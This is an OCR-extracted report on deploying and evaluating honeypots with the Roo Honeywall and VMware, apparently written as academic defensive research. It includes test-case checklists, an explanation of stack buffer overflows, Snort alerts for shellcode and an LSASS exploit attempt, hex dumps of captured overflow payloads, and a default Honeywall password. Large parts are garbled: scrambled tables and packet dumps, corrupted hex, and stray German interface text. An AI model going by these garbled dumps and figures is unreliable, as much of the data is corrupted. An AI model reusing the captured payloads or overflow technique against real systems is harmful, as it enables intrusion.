Improving network security with Honeypots
Contents
1. Internet w public IP w public IP or w private IP figure 3 2 protected environment 1 NAT Network Address Translation Page 14 Improving network security with Honeypots 3 3 Scenario Ill public address This scenario focuses on the IP address on the Honeypot In this scenario the Honeypot is assigned a public address The Internet Assigned Numbers Authority IANA maintains a database IANA 05 which lists the address ranges of public available addresses All previous RFCs have been replaced by this database RFC 3232 A public IP can be addressed from any other public IP in the internet This means that IP datagrams targeting a public IP are routed through the internet to the target A public IP must occur only once it may not be assigned twice Applications on the Honeypot can directly communicate with the internet as they have information of the public internet address This is in contrast to scenario IV where an application on the Honeypot is not aware of the public IP It is further possible to perform a query on the responsible Regional Internet Registry to lookup the name of the address registrar this is called a whois search Regional Internet Registries are AfriNIC African Network Information Centre Africa Region http www afrinic net APNIC Asia Pacific Network Information Centre Asia Pacific Region http www apnic net ARIN American Registry for Internet Numbers2. Improving network security with Honeypots 3 2 Test Case 2 time intervals are normal 3 2 1 Purpose Verify that requirement R002 has been satisfied Honeypot and the Honeywall are still set with correct time and date 3 2 2 Setup Precondition The basic setup has been done see section 1 2 This test requires a watch 3 2 3 Execution 7 wait 5 minutes after test case 1 8 check time and date on the Honeywall entering date 9 Verify that the time elapse was 5 minutes Pass Fail 10 check time and on the Honeypot entering date and time Win 11 Verify that the time elapse was 5 minutes Pass Fail 12 check time and on the Honeypot entering date and time Win 13 Verify that the time elapse was 5 minutes Pass Fail 3 2 4 Verification Verify that R002 time intervals are normal is satisfied with steps 9 11 and 13 3 2 5 Results Summary AAA Page B 8 Improving network security with Honeypots 3 3 Test Case 3 internal IP functionality 3 3 1 Purpose Verify that requirement R003 has been satisfied and the Honeypot is reachable within the internal IP network 3 3 2 Setup Precondition The basic setup has been done see section 1 2 The attacker has an IP from the internal network No other setup is necessary 3 3 3 Execution 14 Attacker pings Honeypot by executing ping lt hplP gt hy 15 Observe that the attacker gets minimum of fo
3. choose 4 Honeywall configuration then 3 Remote Management then 12 Walleye finally answer question Would you like to run the Walleye web interface with Yes Walleye is the Honeynet s data analysis tool based on Perl scripts and running on an apache web server R009 Walleye is displaying correct time Need As stated in R001 correct time is important to proper data analysis EX In the early stages of beta testing there was a problem with time zones the time zone in Walleye did not match Attain This problem is fixed in Roo 1 0 hw 139 In case it happens again please consult the Honeynet webpage at www honeynet org In case that the time zone is set wrong log in to Walleye choose System Admin on the top tabs in the administration menu choose Honeywall configuration Honeynet demographics On the Configure sensors page click edit choose correct time zone and apply settings with Save Even if the time on the operating system is correct the time in Walleye needs to be checked This requirement ensures that the time is synchronized with the underlying operating system R010 Walleye is displaying traffic from R001 Need Walleye is parsing Snort s log files Ex Walleye is parsing Snort s output to display flows In some cases Walleye did not show any more traffic after a certain period Here the Snort captures had to be analyzed manually for obtaining results B
4. uu44444nenne nenne nennen 13 3 2 Scenario Il protected environment 0 2224002220002enne nenne nennen 14 3 3 Scenario Ill public address 0002220022000022000 nenne nenne nennen 15 3 4 Scenario IV private address 222u0220200220200nnnnn nennen nenne nennen 16 3 5 Scenario V risk assessment 16 3 6 Scenario VI Honeypot out Of The DOX occcccocccccocncococonococononanonononoss 17 3 7 Scenario V knowledge educatiON cccooncccconnncconncconcnconannnnnncnnnnanonos 21 4 Planning a Honeypot for FHD uzuu00 0000a00nan0nanunnnnnnanun nun nnnnn nennen 23 4 1 ENVIFONMENT Analysisnsas aan 24 4 2 Evaluation of current solutions 2 u022400200000n0 nenn nenne nnnn nenne nnnen en 25 4 3 Planning an experimental Honeypot u uu044ssenenn nenn enenn nenn nennen 26 44 Implementing the HoneywWall ccooccooccoccncconnccnnononocanccannnnnnonos 32 4 5 GNOOSMA ING Dali 34 5 Running and observing the experiment uurennunennanennnnennnnennnnennnnen 35 5 1 Requirements to a Safe Setup occcccncconccocnoconoconcnonnonanonanccnnnonanenaness 35 5 2 IMemetralaciSynenanaa avandia ches ee 43 S39 ic O 52 5 4 Data analysis from Roo_Die and Roo_Mue 2u222022s0seneneeene 61 6 SUMMAN iu aaa 66 61 AMPFOVING INE MONEYDOL sureste ine 66 o sis 67 63 Qutlookto future Tesearch einen 68 A SHEIeRENCES u nen a RE a A
5. Dark addresses are of value because any packet sent to them is a possible attack and subject for analysis Page 11 Improving network security with Honeypots Packets sent to dark IP addresses can be categorized into three categories scanning malicious broken misconfigured Backscatter As said before it misconfigured traffic should be avoided at all cost This reduces false alerts from the Honeypot In physics Backscatter is the reflection of light radar radio or other electromagnetic waves directly back to the direction they came from In terms of networks Backscatter is the reflection of pakets When an attacker scans a computer he often hides his own IP by performing multiple scans with false IP addresses That way it is more difficult for the victim to determine where the attack actually came from Spin off from those attacks are ICMP packets with false IP addresses which are routed back to their false origin Backscatter analysis is important for projects analyzing worm outbreaks and other internet threat monitoring A project analyzing Backscatter traffic is the Domino project of University of Wisconsin Madison Yegneswaran 04 Page 12 Improving network security with Honeypots 3 Honeypots in the field of application This chapter categorizes the field of application of Honeypots It investigates different environments and explains their individual attributes Five scenarios have been developed to separa
6. North America Region http www arin net LACNIC Regional Latin American and Caribbean IP Address Registry Latin America and some Caribbean Islands http lacnic net en index html RIPE NCC Reseaux IP Europ ens Europe the Middle East and Central Asia http www ripe net Page 15 Improving network security with Honeypots 3 4 Scenario IV private address This scenario also focuses on the IP address on the Honeypot In this scenario the Honeypot is assigned a private address Private addresses are specified in RFC 1918 In contrast to public addresses private IPs can not be addressed from the internet Packets with private addresses are discarded on internet gateways routers To connect to a private address the host needs to be located within the Same address range or it needs provision of a gateway with a route to the target network The Internet Assigned Numbers Authority IANA reserved three blocks of IP addresses namely 10 0 0 0 8 172 16 0 0 12 and 192 168 0 0 16 for private internets For interconnecting private and public networks an intermediate device is used That device needs to implement Network Address Port Translation NAPT RFC 3022 NAPT allows translating many IP addresses and related ports to a single IP and related ports This hides the addresses of the internal network behind a single public IP Outbound access is transparent to most of the applications Unfortunately so
7. layer protocol s application layer HTTP SMTP POP3 SNMP RIP internet layer IPv4 link layer Ethernet Token Ring WLAN figure 5 3 protocol stack A connection from the internet via IP requires two things an internet address IP and a port bound on that IP The address enables a connection to the network and the port number allows the data the payload in the IP datagram to be delivered to a process on the target machine The process then handles the information and depending on its nature performs actions Networking processes are the main target for hackers They can be of the following types process type description security privileges system Kernel process Allows the Kernel to access system process the network and vice versa On Microsoft context Windows operating systems it handles NETBIOS RFC 1002 endpoints next to system related functions figure 5 4 possible networking processes 13 Kernel The kernel is the fundamental part of an operating system It is a piece of software responsible for providing secure access to the machine s hardware to various computer programs It is loaded at first before any other program NETBIOS Network Basic Input Output System It generally refers to a programming API for local network communication Page 45 Improving network security with Honeypots process type description security privileges service A service Windows term or da
8. 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAA
9. E El snapshot ki Des roo 134 State Powered off Guest OS Other Linux 2 6 x kernel Configuration file E VMware Images roo 134 other26x linux vmx Version Current virtual machine for VMware Workstation 4 5 2 Commands Devices gt Start this virtual machine amp Memory 256 MB SS Hard Disk 1 SCSI 0 CD ROM 1 IDE 1 0 Using image C Vtemptroo 2 roo 1 0 b 134 is0 Floppy 1 Using drive A ENIC 1 Bridged ENIC 2 Host only ENIC 3 Host only USB Controller Present Edit virtual machine settings Notes Type here to enter notes for this virtual machine figure 3 neuerzeugte VMware On main menu Edit Virtual network settings Automatic bridging uncheck automatic bridging Host virtual network mapping VMnet0 the host s NIC VMnet1 VMware Network Adapter VMnet1 VMnet8 VMware Network Adapter VMnet8 DHCP remove all NICs Stop Service Apply Page B 42 Improving network security with Honeypots 6 NAT VMnet host disable Stop service apply Finally you have to remove protocol bindings of the host s operating system Otherwise the connection between Honeypot and Honeywall might be polluted by the host It also secures the host as it is not possible to attack it via IP protocol 1 control panel 2 network connections 3 local network connection remove all bindings except for VMware bridge protocol lt 4 Eigenschaften von lokale Netzwerkverbindung Allgemein Authentifizierung
10. Erweitert Verbindung herstellen ber BM 3Com EtherLink 10 100 PCI Combo NIC Diese Verbindung verwendet folgende Elemente mp Client f r Microsoft Netzwerke Y ja VMware Bridge Protocol O El Datei und Druckerfreigabe fur Microsoft Netzwerke O 4 Internetprotokoll TCP IP Installieren Deinstallieren Beschreibung Erm glicht den Zugriff auf Ressourcen in einem MicrosoftNetzwerk Symbol bei Verbindung im Infobereich anzeigen v Benachrichtigen wenn diese Verbindung eingeschr nkte oder keine Konnektivit t besitzt figure 4 settings on host NIC 4 VMnet1i remove all bindings Page B 43 Improving network security with Honeypots Eigenschaften von VMware Network Adapter VM Allgemein Authentifizierung Erweitert verbindung herstellen ber BY VMware Virtual Ethernet Adapter for YM Diese Verbindung verwendet folgende Elemente O ol Client f r Microsoft Netzwerke O al vmware Bridge Protocol O El Datei und Druckerfreigabe fur Microsoft Netzwerke O Internetprotokoll TCP IP Installieren Deinstallieren Beschreibung Erm glicht den Zugriff auf Ressourcen in einem Microsoft Netzwerk E Symbol bei Verbindung im Infobereich anzeigen _ Benachrichtigen wenn diese Verbindung eingeschr nkte oder keine Konnektivit t besitzt figure 5 VMnet1 settings 5 VMnet8 remove all bindings except for IP protocol e
11. The installation process will wipe the entire disk To boot from CD change the boot order in your computer s BIO and insert the CD Roo is installed automatically without user interaction Remove the CD when completed Online Handbuch Roo Hhttp www honeynet org tools cdrom Roo manual 2 require htmlH Page B 39 Improving network security with Honeypots After installation you will be prompted by a login Note that it is not possible to log in as Root directly Use Roo instead an enter su to gain Root privileges Default password for both accounts is honey The command menu opens a text dialog menu which queries most important information and activates the Honeywall Some config options have to be created manually i e the files fencelist txt blacklist txt and whitelist txt To start with initial configuration select option 4 Honeywall configuration You can choose to use default values enter the information individually or load a pre defined config file honeywall conf I Important honeywall conf is ONLY used during setup it does not store variables in an active system During operation the variables are stored in hw conf Page B 40 Improving network security with Honeypots 3 VMware installation These installation instructions require that the source CD is available as an iso image You can download this image directly on honeynet org 3 1 System requirements CPU Pentium
12. figure 5 2 internet architecture extracted from RFC1122 Page 43 Improving network security with Honeypots transport layer The transport layer provides end to end communication services for applications Currently there are two primary transport layer protocols Transmission Control Protocol TCP User Datagram Protocol UDP TCP is a reliable connection oriented transport service that provides end to end reliability resequencing and flow control UDP is a connectionless datagram transport service internet layer All Internet transport protocols use the Internet Protocol IP to carry data from source host to destination host IP is a connectionless or datagram internetwork service providing no end to end delivery guarantees Thus IP datagrams may arrive at the destination host damaged duplicated out of order or not at all The layers above IP are responsible for reliable delivery service when it is required The IP protocol includes provision for addressing type of service specification fragmentation and reassembly and security information link layer To communicate on its directly connected network a host must implement the communication protocol used to interface to that network We call this a link layer or media access layer protocol figure 5 2 internet architecture continued Page 44 Improving network security with Honeypots The layers are summarized in the protocol stack
13. here it is 0x1234 The sub routine also needs memory to store its variables a b c Therefore the stack is extended with the needed size and the addresses OxFF3A OxFF1Cand OxFF14 are reserved for a b c The stack basepointer 4 is indicating the end of the stack and is updated according to the new stack size After these operations are finished the jump instruction can be executed and processing of the sub routine s code is initiated 5 The end of the sub routine contains instructions to write the return address 0x1234 to the instruction pointer free the memory used by a b c and execute the jump back to 0x1234 6 After the jump back to the main program the code following the jump call routine is executed 7 Vulnerability memory management The general vulnerability is within memory management Many programming languages such as C and C do not check if write and read instructions stay within their reserved memory area This can be used to create a Buffer Overflow The example in figure 5 5 shows that variables are stored after the return address and stack basepointer They are stored from top to bottom of the stack According to their definition memory is reserved char a 4 4 bytes char b 30 30 bytes and double e 8 bytes As long as the routine stores 29 bytes into b the 30 byte has to be a binary 0 0x0 to mark the end of the string the execution continues normally Page 49 Improving network security
14. installations is only depending on network settings Page 32 Improving network security with Honeypots For each setup a setup instruction sheet was used to note individual settings That sheet was available for the predecessor of Roo eeyore and has been updated for Roo The new version can be found in the appendix see B 3 lt covers settings for the mode of the firewall remote management interface outbound control limits alerting and Sebek setup Primary purpose is to ensure that setup details can be accessed later when analyzing the results Both Honeywalls were set to bridge mode and provided a management interface At FHD the management interface was accessed through the host computer 4 4 1 Roo s components Roo v1 39 is based on a Linux Fedora 3 core Roo is using the following applications to control and contain hacker activity Component Description Application 500 44 1 snort_ inline Snort_inline is basically a modified version of Snort that accepts packets from iptables see below It then uses new rule types drop sdrop reject to tell iptables whether the packet should be dropped rejected modified or allowed to pass based on a snort rule set It is an Intrusion Prevention System IPS that uses existing Intrusion Detection System IDS signatures to make decisions on packets that traverse snort_inline session limit A modification to the OpenBSD pf firewall tool Gives rate session limiting cap
15. 3 4 external IP functionality R004 needs to be satisfied according to 3 4 4 3 5 3 Execution 22 Execute nslookup www google com on the attacker NER 23 Observe that the attacker gets a DNS reply Pass Fail 24 Execute nslookup www google com on the Honeypot IS 25 Verify that the Honeypot gets a DNS reply with the same Pass Fail IP s as in Step 11 3 5 4 Verification Verify that R005 DNS functionality is satisfied with step 25 3 5 5 Results Summary Date Time Pass Fail Page B 11 Improving network security with Honeypots 3 6 Test Case 6 restricted access for Honeypot 3 6 1 Purpose Verify that requirement ROO6 has been satisfied and the Honeypot is not able reach restricted addresses according to fencelist txt 3 6 2 Setup Precondition Setup is the same as in 3 3 internal IP functionality R003 needs to be satisfied according to 3 3 4 3 6 3 Execution The Execution needs to be repeated for every single IP in fencelist txt If a network address is defined in fencelist txt the repetition should include at least three IPs of that network range Step Results 26 Execute ping bIIP on the Honeypot i 27 Verify that the Honeypot gets not reply by displaying a Pass Fail timeout 3 6 4 Verification Verify that ROO6 restricted access for Honeypot is satisfied with step 27 3 6 5 Results Summary Page B 12 Improving network security wit
16. 43 23723 ECC CCSECECECOCEC BS o 4S 3 22 AS Mo AS AS 23 AS aS aS do CECCCSOCGOSCCOCES a gt AS 43 43 2374343 43 243 43 43 43 45 43 4343 CO OC COC CCCOCECOCE 2 3 43 43 43 43 43 42 2323 43 23 43 25 43 43 AS COCCCOCOCCECCCECE Bd aS MAS Ao Ao ds AS 43 DS AS ASAS 43 43 2323 VECCSTEELLRELELTETE Bo A Mo AS do 45 23 220522223 COCCOSCCECECOOCE AD do Mo Ao Ho ds do o DS AS ASAS do Ho AS aS CELEC EL EECC CECU 23 43 35 43 43 AS 43 45043 do 43 23 43 43 23 43 CCCOCECCCECCECCOS AS As ds AS 145 13 143 AS Aa AS AS VES AS AS AO AS CC CCE CE CCC CCE CCE Page B 23 Improving network security with Honeypots AS ES AO AS ES AS 2303293232233 BS AS COCO CCC Ce CCC Cee AS 23 o AS MOS VAS AS AS AS MS Bo EI 223 TEO CC CEC CO CCC Cee AS oe SO 23 43 43 AS AS AS AS AS AS ASAS ES AS OOO COSES CCE CEC da da ES AS MS ASAS AS MS AS AS ASS 4 AS AS E COCOCOSEC SUECOS 13 Ao o AA AO AO AS AS A AS A AS AS A EE ECOS E CCOO 45 43 Ao 43 43 43 23 43 45 43 43 434323 2323 COCECCCOECOCCECCCE 25 4345 Ao 43 43 24343243 43 43 43 AS 23 23 43 CEOCOCCCECCCUCCCE ga Aa 43 43 45 43 23 43 45 43 43 4234323 23543 COCECCCCOCECECCEG AS AS AS 43 43 43 43 439 413 43 43 43 43 43 23 23 CCCCCCECeCCCECCEe AS AS 43 43 43 43 23 23 43 43 43 43 43 43 23 43 CC CCECCCC CCC CECE 15 AS do A do o 2S AS Ao aD eS 23 245 43 43 23 see CeCe Ce CCC eC CCE ee ee ee HHHH 06 7 Z3 17235253 2167101 0229 3C53 7 D82 76 gt 02 LOGAB lt
17. 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
18. 505 RAS 22 Eyps 0x800 len 0x5B5 SAO DA IZA TO 57 19221683210 39244135 TCP ITA LAA 7052020 103999 IpLen 20 DgmLen 1447 DF KASAPA Seg 0x5146280F Ack Ox2B47D99A Win OxFCC7 TcpLen 20 45 43 43 43 43 43 23 43 43 43 43 45 45 43 2343 CCCCCCCCCCCCCCCE 25 43 43 43 43 43 43 45 43 43 43 45 43 43 23 43 sCCCCCCCCCCCCECEC 45743 4343 45 43 43 45 45 43 43 45 45 43 AS AS sCCCCCCCCCCCECCCE AS AS AS 43 43 43 23 43 4345 43 43 43 43 23 23 CCCCCClCC CC CECE AS AS AS As d3 43 23 243 43 43 43 43 43 423 23 43 CC CCCCCCCCCCCCEEe AS AS o AG AS do O O O AS LS 45 43 4323 URC CECE CC CCC CCC ee A i o A AS AS wo to a AS AS O AS as AS CC CCCEC CCC eC CCCe AS do do A do AS ao AS A AS eS AS do o Us 23 EC CC CEC CCC Ce CC ee AS do AS AS da AS AS 43 de 43 AS 43 043 453 223 43 HOCCCCCCECECECECEe AS do AS Ao AS AS aS AS AS AS Ls so do do 43 dos CC CCCECECCCCCECE A gt 43 23 4343 43 23 2234342323 Lo 45 45 43 43 COCCCCOCCCCUCCCE 43 43 43 439 43 43 23 do 43 43 43 43 do do 43 43 COCCECCCCECECCCOCE a gt 43 23 423 43 49 23 22343 4223 43 45 43 23 43 COCUCCCCCCCECUCCO 253 43 AS 430 43 43 23 43 43 43 23 43 2323 23 43 COCOCCOECECCCECECCE 4 5 43 LS 43 43 43 43 245 43 43 23 423 43543 43 243 CCCCCCCCE CECECEC BS 43 4 AS 43 42 2323 43 43 23 423 23 23 23 aS 3SCSELELEELSEELEEE 25 43 23 45323 437253 23 23 43 23 43 245 43 23123 CTOCCCECECCECCCES BS 43 Us AS 23 43 46 US AS 43 235 423 23 23 23 23 ACCC CEC UCC Ce C
19. 80 are by 92 unsuccessful scans The remaining 8 were used to download binary data of 120kB to the Honeypot Unfortunately the payload does not show any recognizable pattern so this would also require intensive exploration in the future 19 The TFTP Get message initiates a download Page 65 Improving network security with Honeypots 6 Summary 6 1 Improving the Honeypot Analyzing the data is consuming a lot of time Often patterns of attacks are repeated Especially attacks of worms are repeated in a continuous manner A Honeynet operator should carefully inspect every flow to avoid missing the attacks which show new patterns The difficulty in this is that attacks could consist of more than one Snort alert So an advanced attack detector would have to analyze the sequence of attacks per flow and compare them with other attacks to find duplicates A drastic improvement in speeding up the analysis would be to summarize similar attacks in one entry and show only the number of appearances une 12th 20 08 26 00 00 04 lt NETBIOS SMB DS IPC unicode share access 84 58 138 242 gt 192 168 10 49 lt 10 SHELLCODE x86 0x90 unicode NOOP 2 ee mieresofide lt 4 NETBIOS SMB DS DCERPC LSASS RST os unkn lt 2 kB 21 DsRolerUpgradeDownlevelServer exploit attempt pkts lt O unknown signature figure 6 1 flow with multiple alerts Further to that it is saving even more time if those well known attacks are not even a
20. CIFS implementation in Windows operating systems only a technical reference about the protocol Microsoft 02 CIFS is using the SMB protocol directly over TCP IP Microsoft 03 An inspection of the first flow shows that this was a probe to determine if the port is accessible A TCP connection was established with a handshake as specified in RFC 793 and immediately closed This is called a connect scan Honeynet 04 QO0000 64 56 10 92 192 108 10 39 4654 gt microsoft ds seg 0 Ack 0 Win 64600 Len 0 MSS 000658 192 168 10 39 84 58 107 92 TCP microsoft ds gt 4654 SYN ACK Seq 0 Ack 1 Win 17280 Len 0 653302 84 58 107 92 192 168 10 39 TCP 4654 gt microsoft ds ACK Seg 1 Ack 1 win 64800 Len 0 655178 84 58 107 92 192 168 10 39 TCP 4654 gt microsoft ds FIN ACK Seq 1 Ack 1 win 64800 Len 0 655608 192 168 10 39 84 58 107 92 TCP microsoft ds gt 4654 FIN ACK Seq 1 Ack 2 Win 17280 Len 0 339241 84 58 107 92 192 168 10 39 TCP 4654 gt microsoft ds ACK Seq 2 Ack 2 Wwin 64800 Len 0 Wee Off il 2 E 4 5 6 figure 5 14 probe connection Page 56 Improving network security with Honeypots The second flow is marked with a Snort alert SHELLCODE x86 inc ebx NOOP see beginning of 5 2 2 for definition of shellcode A rule evaluation for this flow shows the full details of this alert 06 23 17 35 53 186615 ee MALAS 5 SHR LECODE 236 ane ebx NOOP 7 Classification Executable code was detected Priorit
21. DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 00 00 00 00 00 00 DDD DDD DDD 22 44 _ 4 4 4 4 4 ee ee a ee ee ee ee ee ee ee 06 23 1 1 55253232 18 45 051 0s 4B 50 saa 27 gt 03207C5 2 73D6 76 Eype20x800 len 0x3C LIZ Veo Le Ao OO LO e 92a ATO TCE TTL 120 OSs Ox0 TID L22 IpLen 20 DgmLen 40 DF KKAXKKKK Seg 0x2B47D99A Ack Ox51462D8E Win 0x4380 Tcplen 20 0672317 2 35253 50 3051 Oe LO ABE 50222522 SS OS ADECCO eee 76 EypE20x800 len 0x5D Page B 26 Improving network security with 1922168310322 92425 98422382 1 0729222 719 ICP TEE IpLen 20 DgmLen 79 DF KAANPRrRrR Seq 0x2B47D99A Ack 0x51462DSE Win 00 00 00 00 00 00 00 00 00 ASEO ADN AZ SO GO O CO 9 Se UN ES 00 00 00 0 0 00 0 07 00 00 000 090 04 37 13 00 00 00 00 06 23 17 len 0x36 8552044922098 02 AO C5267 2 DOs gt DO Soo 1042922417770 UBA LOS DU o 92245 TER TELS IpLen 20 DgmLen 40 DF RRXXAX X FE Seg Ox51462D8E Ack 0x2B47D9C1 Win 06723 1715355522922821 DELOSABESOSAREZO gt DEA0 len 0x3 e 192 188 10 83 92425 gt 82 982107229222778 TCR TTD IpLen 20 DgmLen 40 DF xx xA FEF Seq 0x2B47D9C1 Ack 0x51462D8F Win 0672391172352 56 320550 02030 32 7 DE 76 gt 0210 len 0x36 SAD LOD 2 922277 OZ LOO LO
22. E E E R O 0O O O EAEE LEERE A E EE EE E sag 150 poe 0 ESEG sespeola O seep are M ubR soiau es PEPPFFFFFFTFFFFEFLFERRFURPEPPFPRPEF TEATROS EOI RAIN DRNA EEN 801 8 SU SOIqJau El ZIE ZI 0Z8 61 aose Osos spd 1s0 sayiq DUS Spd J s sad isa SUNWIKEY MOJ JENPIAIDUT SIEJIOL area 5007 63 65 87 De ABW UOW pue 9002 p3 3 1 pz ACW an uaamgag Lod jsp Aq pajebalbby smol pajebalbby Page B 36 Improving network security with Honeypots B 5 Setup description for Roo There are two different setup scenarios The first is a regular installation on a machines hardware Second is installing Roo under VMware workstation The second option has some interesting advantages lt allows to install an entire Honeynet on a single computer This saves money for hardware and makes it easily portable i e on a laptop Current version June 25 2005 is Roo v1 0 hw 139 abbr Roo 139 1 Download Roo is available on the Honeynet Projects homepage There you also can After downloading it is highly recommended to download the official manua verify the MD5 checksum Calculation of the checksum should be performed on a UNIX operating system Windows is treating linefeeds differently it uses CR LF while UNIX uses CR 2 Regular installation 2 1 System requirements CPU Pentium IV min Pentium lll sufficient for an experimental system AMD is also
23. IV 2 4GHz main memory 1GB hard disk 40GB network adapter 1NIC CD ROM If no direct connection to the internet is availabe you need a CD ROM to copy the image 3 2 Setup After opening VMware perform the following steps bh New Virtual Machine NO Select the appropriate Configuration Custom O Select a Guest Operating System Linux Other Linux 2 6x kernel N Name the virtual machine Roo 139 Roo 139 ist die aktuelle Version Pfad des VMware Images O1 Memory for the virtual machine 512MB O Network Type Use bridged networking N Select I O Adapter Types Buslogic 00 Select a disk Create a new virtual disk Select a disk type SCSI 0 1 2 O 10 Specify disk capacity 10GB Allocate disk space now 11 Dialog warning yes 12 Specify disk file Roo 134 Honeynet Projekt Hhttp www honeynet org tools cdrom Roo iso currentH Page B 41 Improving network security with Honeypots 13 Disk creating process 14 Done Before booting the Honeywall you have to add two virtual network adapters O N N 5 6 1 On main menu VM Settings CD ROM change to iso file Pfad des iso Images NICs add gt Hardware type Ethernet Adapter gt Network type Host only NICs add gt Hardware type Ethernet Adapter gt Network type Host only Audio remove OK File Edit View VM Power Snapshot Windows Help mm
24. Page 67 Improving network security with Honeypots 6 3 Outlook to future research From the current point of development Honeypots will advance to process more protocols Roo is not yet capable of automatically processing protocols other than IP TCP UDP and ICMP In the future more protocols will be processed automatically This will also extend the range of Honeypots Current techniques focus on computers but it would be also important to monitor network devices such as routers or Layer 3 switches As intrusion detection systems advance to distributed systems so can Honeypots Consider a scenario where an operator has deployed several Honeynets on different networks It would improve analysis if the captured information would be automatically retrieved and gathered on a central point Current developments of data mining systems could be adapted to analyze Honeypot data This would allow better statements on current threats and show related trends towards attacking techniques Page 68 Improving network security with Honeypots A References BIPM 98 CNNMoney 05 Fyodor 05 Honeynet 04 Honeynet 05 IANA 05 Intel 97 Kaspersky 05 Kirchner 93 Bureau International des Poids et Mesures BIPM The International System of Units SI 7 edition 1998 Jeanne Sahadi 40M credit cards hacked CNNMoney news article on credit card theft at MasterCard http money cnn com 2005 06 1 7 news master_card Cable Ne
25. another network would only make sense if the Honeywall is physically located in a protected and locked server Room and the operator has access to the local network Page 30 Improving network security with Honeypots JodAsuoH H gseunAa uonejje sul SIEMIYA JO NOAE p p 3ANBIJ 41094 Auo 1504 i 298119341 410394 GEM 31094 Auo SOU i SOELEJU 410MJ9U SJEMUIA Jjaidepe 30m au jesis gd 0 peGpug i0 398 19 U1 410491 GEM SJEMAJAA Ul payeysul jod e uo y SIEMA Ul pajjejsu ema Loy E s aBue SSOJppe SJEMLUA NEMINA 104 Jaynd uoa 10H QBABUWA P O OF OOL LFL yeuqns Ylomjau H4 Page 31 Improving network security with Honeypots Setup VMware host CPU Pentium IV 2 80 GHz RAM 1024 MB Harddisk 150 GB Chipset Intel 82801EB NIC Realtek RTL8139 810X Software OS Windows XP SP2 Build 2600 xpsp2_gdr 050301 1519 additional S W VMware 4 5 2 Build 8848 figure 4 5 setup details VMware host FHD Setup Honeypot and Honeywall Virtual machine Honeypot Honeywall VMnet8 host only VMneto0 bridged to physical network sowe a installed fixes no Service Packs or Hotfixes installed figure 4 6 setup Honeywall FHD 4 4 Implementing the Honeywall The type of machine real or virtual does not matter to Roo The operating system is installed as regular Device drivers are available for both platforms and included in the default distribution The main difference between the
